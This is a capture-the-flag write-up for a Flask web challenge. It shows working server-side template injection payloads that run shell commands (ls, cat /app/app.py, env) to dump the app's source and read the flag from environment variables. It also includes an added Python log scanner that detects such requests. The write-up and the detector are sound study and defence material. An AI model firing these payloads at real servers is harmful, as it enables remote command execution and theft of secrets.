AUCHALL - [Web] - Temp
Challenge Description
I'm temporarily storing files for you...
Solution
Opening the challenge presents a portfolio website.
Nothing looks interesting until you try different paths on the site, such as /login and /check.
Suppose we go to /check.
The endpoint name is reflected on the page, which hinted at XSS. But we would not get anything from that unless a bot is involved, so I skipped XSS and checked for server-side template injection (SSTI) instead:
http://SERVER-IP:PORT/{{7*7}}
I got 49, so the server evaluated the expression, which confirms that there is SSTI.
Then I used an SSTI payload to run shell commands:
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
App Source Code
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}
app.config["FLAG"] = "You're at the right path, but no. The flag is not here."
This tells me that I have to fuzz the container.
Then I checked env.
The flag is in env:
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}
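From the defender's side, requests like the ones above leave a recognisable trace in the web server's access log. The following added example (not part of the original writeup or of the challenge's code) scans log lines for Jinja-style template delimiters in the request target after undoing percent-encoding; the log lines are constructed samples, and the function names and verdict labels are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines for illustration (not from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /check HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '10.0.0.5 - - [01/Jan/2024:10:00:30 +0000] "GET /%7B%7B%20self.__init__.__globals__%20%7D%7D HTTP/1.1" 200 901',
    '10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /login?next=%2Fcheck HTTP/1.1" 200 640',
    '10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /%257B%257B7*7%257D%257D HTTP/1.1" 404 120',
]

REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|PATCH) (\S+) HTTP/[\d.]+"')
EXPRESSION = re.compile(r'\{\{.*?\}\}|\{%.*?%\}', re.S)  # {{ ... }} or {% ... %}
DUNDER = re.compile(r'__\w+__')  # attribute names such as __init__, __globals__

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded delimiters are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return (verdict, decoded_target) for a suspicious line, else None."""
    m = REQUEST.search(line)
    target = decode_fully(m.group(1)) if m else ""
    exprs = EXPRESSION.findall(target)
    if not exprs:
        return None
    # Dunder access inside an expression goes beyond an arithmetic probe.
    verdict = "object-traversal" if any(DUNDER.search(e) for e in exprs) else "probe"
    return verdict, target

def scan(lines):
    """Return (client_ip, verdict, decoded_target) for every flagged line."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append((line.split()[0],) + result)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "probe" followed by "object-traversal" from the same client within a short window is the sequence worth alerting on.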
Flag
The flag is dynamic.
CY243L{sst1s_1n_fl4sk_ar3_ez_pz_CAa3Ee9_ZcdU_XPJ3}
Writeups 2023 © RootxRAN.